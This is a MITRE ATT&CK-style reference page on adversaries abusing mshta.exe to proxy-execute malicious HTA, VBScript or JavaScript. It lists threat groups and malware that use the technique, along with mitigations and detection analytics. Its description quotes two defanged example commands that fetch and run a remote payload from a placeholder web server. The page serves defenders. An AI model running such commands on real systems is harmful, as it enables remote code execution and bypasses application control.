1. Home
  2. Techniques
  3. Enterprise
  4. System Binary Proxy Execution
  5. Mshta

System Binary Proxy Execution: Mshta

ID Name
T1218.001 Compiled HTML File
T1218.002 Control Panel
T1218.003 CMSTP
T1218.004 InstallUtil
T1218.005 Mshta
T1218.007 Msiexec
T1218.008 Odbcconf
T1218.009 Regsvcs/Regasm
T1218.010 Regsvr32
T1218.011 Rundll32
T1218.012 Verclsid
T1218.013 Mavinject
T1218.014 MMC
T1218.015 Electron Applications

Adversaries may abuse mshta.exe to proxy execution of malicious .hta files and Javascript or VBScript through a trusted Windows utility. There are several examples of different types of threats leveraging mshta.exe during initial compromise and for execution of code [1] [2] [3] [4] [5]

Mshta.exe is a utility that executes Microsoft HTML Applications (HTA) files. [6] HTAs are standalone applications that execute using the same models and technologies of Internet Explorer, but outside of the browser. [7]

Files may be executed by mshta.exe through an inline script: mshta vbscript:Close(Execute("GetObject(""script:https[:]//webserver/payload[.]sct"")"))

They may also be executed directly from URLs: mshta http[:]//webserver/payload[.]hta

Mshta.exe can be used to bypass application control solutions that do not account for its potential use. Since mshta.exe executes outside of the Internet Explorer's security context, it also bypasses browser security settings. [8]

ID: T1218.005
Sub-technique of:  T1218
Tactic: Defense Evasion
Platforms: Windows
Contributors: @ionstorm; Ricardo Dias; Ye Yint Min Thu Htut, Offensive Security Team, DBS Bank
Version: 2.1
Created: 23 January 2020
Last Modified: 24 October 2025
Version Permalink

Procedure Examples

ID Name Description
G0016 APT29

APT29 has use mshta to execute malicious scripts on a compromised host.[9]
G0050 APT32

APT32 has used mshta.exe for code execution.[10][11]
G0082 APT38

APT38 has used a renamed version of mshta.exe to execute malicious HTML files.[12]

S0414 BabyShark

BabyShark has used mshta.exe to download and execute applications from a remote server.[13]
C0015 C0015

During C0015, the threat actors used mshta to execute DLLs.[14]
G0142 Confucius

Confucius has used mshta.exe to execute malicious VBScript.[15]

S1155 Covenant

Covenant can create HTA files to install Grunt listeners.[16]
G1006 Earth Lusca

Earth Lusca has used mshta.exe to load an HTA script within a malicious .LNK file.[17]
G0046 FIN7

FIN7 has used mshta.exe to execute VBScript to execute malicious code on victim systems.[5]
G0047 Gamaredon Group

Gamaredon Group has used mshta.exe to execute malicious files.[18][19][20][21]
G0100 Inception

Inception has used malicious HTA files to drop and execute malware.[22]
G0094 Kimsuky

Kimsuky has used mshta.exe to run malicious scripts on the system.[23][13][24][25]
S0250 Koadic

Koadic can use mshta to serve additional payloads and to help schedule tasks for persistence.[26][27]

G0032 Lazarus Group

Lazarus Group has used mshta.exe to execute HTML pages downloaded by initial access documents.[28][29]
G0140 LazyScripter

LazyScripter has used mshta.exe to execute Koadic stagers.[27]

S1213 Lumma Stealer

Lumma Stealer has used mshta.exe to execute additional content.[30][31]
S0455 Metamorfo

Metamorfo has used mshta.exe to execute a HTA payload.[32]

G0069 MuddyWater

MuddyWater has used mshta.exe to execute its POWERSTATS payload and to pass a PowerShell one-liner for execution.[33][34]
G0129 Mustang Panda

Mustang Panda has used mshta.exe to launch collection scripts.[35]
S0228 NanHaiShu

NanHaiShu uses mshta.exe to load its program and files.[36]
C0016 Operation Dust Storm

During Operation Dust Storm, the threat actors executed JavaScript code via mshta.exe.[1]
S0223 POWERSTATS

POWERSTATS can use Mshta.exe to execute additional payloads on compromised hosts.[33]
S0147 Pteranodon

Pteranodon can use mshta.exe to execute an HTA file hosted on a remote server.[18]
S0379 Revenge RAT

Revenge RAT uses mshta.exe to run malicious scripts on the system.[37]
S0589 Sibot

Sibot has been executed via MSHTA application.[38]
G1008 SideCopy

SideCopy has utilized mshta.exe to execute a malicious hta file.[39]
G0121 Sidewinder

Sidewinder has used mshta.exe to execute malicious payloads.[40][41]
G1018 TA2541

TA2541 has used mshta to execute scripts including VBS.[42]
G0127 TA551

TA551 has used mshta.exe to execute malicious payloads.[43]
S0341 Xbash

Xbash can use mshta for executing scripts.[44]

Mitigations

ID Mitigation Description
M1042 Disable or Remove Feature or Program

Mshta.exe may not be necessary within a given environment since its functionality is tied to older versions of Internet Explorer that have reached end of life.
M1038 Execution Prevention

Use application control configured to block execution of mshta.exe if it is not required for a given system or network to prevent potential misuse by adversaries. For example, in Windows 10 and Windows Server 2016 and above, Windows Defender Application Control (WDAC) policy rules may be applied to block the mshta.exe application and to prevent abuse.[45]

Detection Strategy

ID Name Analytic ID Analytic Description
DET0506 Detecting Mshta-based Proxy Execution via Suspicious HTA or Script Invocation AN1397

Detection of mshta.exe execution where command-line arguments reference remote or local HTA/script content (VBScript/JScript) followed by subsequent file creation, network retrieval, or process spawning that indicates payload execution outside standard Internet Explorer security context. Correlation includes parent process lineage, command-line inspection, and network connection creation to untrusted or anomalous endpoints.

References

  1. Gross, J. (2016, February 23). Operation Dust Storm. Retrieved December 22, 2021.
  2. McCammon, K. (2015, August 14). Microsoft HTML Application (HTA) Abuse, Part Deux. Retrieved October 27, 2017.
  3. Berry, A., Galang, L., Jiang, G., Leathery, J., Mohandas, R. (2017, April 11). CVE-2017-0199: In the Wild Attacks Leveraging HTA Handler. Retrieved October 27, 2017.
  4. Dove, A. (2016, March 23). Fileless Malware – A Behavioural Analysis Of Kovter Persistence. Retrieved December 5, 2017.
  5. Carr, N., et al. (2017, April 24). FIN7 Evolution and the Phishing LNK. Retrieved April 24, 2017.
  6. Wikipedia. (2017, October 14). HTML Application. Retrieved October 27, 2017.
  7. Microsoft. (n.d.). HTML Applications. Retrieved October 27, 2017.
  8. LOLBAS. (n.d.). Mshta.exe. Retrieved July 31, 2019.
  9. ESET. (2022, February). THREAT REPORT T3 2021. Retrieved February 10, 2022.
  10. Dahan, A. (2017, May 24). OPERATION COBALT KITTY: A LARGE-SCALE APT IN ASIA CARRIED OUT BY THE OCEANLOTUS GROUP. Retrieved November 5, 2018.
  11. Dahan, A. (2017). Operation Cobalt Kitty. Retrieved December 27, 2018.
  12. SEONGSU PARK. (2022, December 27). BlueNoroff introduces new methods bypassing MoTW. Retrieved February 6, 2024.
  13. CISA, FBI, CNMF. (2020, October 27). https://us-cert.cisa.gov/ncas/alerts/aa20-301a. Retrieved November 4, 2020.
  14. DFIR Report. (2021, November 29). CONTInuing the Bazar Ransomware Story. Retrieved September 29, 2022.
  15. Lunghi, D and Horejsi, J. (2018, February 13). Deciphering Confucius: A Look at the Group's Cyberespionage Operations. Retrieved December 26, 2021.
  16. cobbr. (2021, April 21). Covenant. Retrieved September 4, 2024.
  17. Chen, J., et al. (2022). Delving Deep: An Analysis of Earth Lusca’s Operations. Retrieved July 1, 2022.
  18. Symantec. (2022, January 31). Shuckworm Continues Cyber-Espionage Attacks Against Ukraine. Retrieved February 17, 2022.
  19. Unit 42. (2022, December 20). Russia’s Trident Ursa (aka Gamaredon APT) Cyber Conflict Operations Unwavering Since Invasion of Ukraine. Retrieved September 12, 2024.
  20. Rusnák, Z. (2024, September 26). Cyberespionage the Gamaredon way: Analysis of toolset used to spy on Ukraine in 2022 and 2023. Retrieved October 30, 2024.
  21. Threat Hunter Team, Symantec and Carbon Black. (2025, April 10). Shuckworm Targets Foreign Military Mission Based in Ukraine. Retrieved July 23, 2025.
  22. GReAT. (2019, August 12). Recent Cloud Atlas activity. Retrieved May 8, 2020.
  23. Alyac. (2019, April 3). Kimsuky Organization Steals Operation Stealth Power. Retrieved August 13, 2019.
  1. Crowdstrike. (2020, March 2). 2020 Global Threat Report. Retrieved December 11, 2020.
  2. KISA. (2021). Phishing Target Reconnaissance and Attack Resource Analysis Operation Muzabi. Retrieved March 8, 2024.
  3. Magius, J., et al. (2017, July 19). Koadic. Retrieved September 27, 2024.
  4. Jazi, H. (2021, February). LazyScripter: From Empire to double RAT. Retrieved November 17, 2024.
  5. Saini, A. and Hossein, J. (2022, January 27). North Korea’s Lazarus APT leverages Windows Update client, GitHub in latest campaign. Retrieved January 27, 2022.
  6. Pradhan, A. (2022, February 8). LolZarus: Lazarus Group Incorporating Lolbins into Campaigns. Retrieved March 22, 2022.
  7. Vishwajeet Kumar, Qualys. (2024, October 20). Unmasking Lumma Stealer: Analyzing Deceptive Tactics with Fake CAPTCHA. Retrieved March 22, 2025.
  8. Leandro Fróes, Netskope. (2025, January 23). Lumma Stealer: Fake CAPTCHAs & New Techniques to Evade Detection. Retrieved March 22, 2025.
  9. Sierra, E., Iglesias, G.. (2018, April 24). Metamorfo Campaigns Targeting Brazilian Users. Retrieved July 30, 2020.
  10. Singh, S. et al.. (2018, March 13). Iranian Threat Group Updates Tactics, Techniques and Procedures in Spear Phishing Campaign. Retrieved April 11, 2018.
  11. Kaspersky Lab's Global Research & Analysis Team. (2018, October 10). MuddyWater expands operations. Retrieved November 2, 2018.
  12. Counter Threat Unit Research Team. (2019, December 29). BRONZE PRESIDENT Targets NGOs. Retrieved April 13, 2021.
  13. F-Secure Labs. (2016, July). NANHAISHU RATing the South China Sea. Retrieved July 6, 2018.
  14. Gannon, M. (2019, February 11). With Upgrades in Delivery and Support Infrastructure, Revenge RAT Malware is a Bigger Threat. Retrieved November 17, 2024.
  15. Nafisi, R., Lelli, A. (2021, March 4). GoldMax, GoldFinder, and Sibot: Analyzing NOBELIUM’s layered persistence. Retrieved March 8, 2021.
  16. Threat Intelligence Team. (2021, December 2). SideCopy APT: Connecting lures victims, payloads to infrastructure. Retrieved June 13, 2022.
  17. Rewterz. (2020, April 20). Sidewinder APT Group Campaign Analysis. Retrieved January 29, 2021.
  18. Rewterz. (2020, June 22). Analysis on Sidewinder APT Group – COVID-19. Retrieved January 29, 2021.
  19. Ventura, V. (2021, September 16). Operation Layover: How we tracked an attack on the aviation industry to five years of compromise. Retrieved September 15, 2023.
  20. Duncan, B. (2021, January 7). TA551: Email Attack Campaign Switches from Valak to IcedID. Retrieved March 17, 2021.
  21. Xiao, C. (2018, September 17). Xbash Combines Botnet, Ransomware, Coinmining in Worm that Targets Linux and Windows. Retrieved November 14, 2018.
  22. Coulter, D. et al.. (2019, April 9). Microsoft recommended block rules. Retrieved August 12, 2021.